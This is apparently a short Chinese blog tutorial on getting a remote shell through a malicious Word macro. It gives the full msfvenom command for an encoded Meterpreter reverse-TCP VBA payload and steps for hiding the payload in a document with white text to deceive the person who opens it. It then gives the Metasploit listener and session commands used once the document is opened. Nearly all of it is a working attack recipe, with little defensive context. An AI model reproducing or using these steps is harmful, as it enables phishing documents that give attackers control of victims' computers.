1.1.1 使用office宏获取shell
1.1.1.1 生成宏后门
# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe
1.1.1.2 制作带后门的宏文档
复制第一段代码到编辑器中:
复制第二段代码payload到word正文:
将字体设置为白色,增加迷惑性:
另存为启用宏的word文档:
1.1.1.3 启动msf监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.10.180 LHOST => 192.168.10.180 msf6 exploit(multi/handler) > run –j
1.1.1.4 打开文档测试连接
msf6 exploit(multi/handler) > sessions
msf6 exploit(multi/handler) > sessions -i 1 # 查看后门进程 meterpreter > getpid Current pid: 2224 meterpreter > ps
温馨提示:本文最后更新于
转载请注明本文链接:https://blog.leonshadow.cn/763482/3032.html
2022-12-20 20:57:31
,已超过455
天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!转载请注明本文链接:https://blog.leonshadow.cn/763482/3032.html
© 版权声明
THE END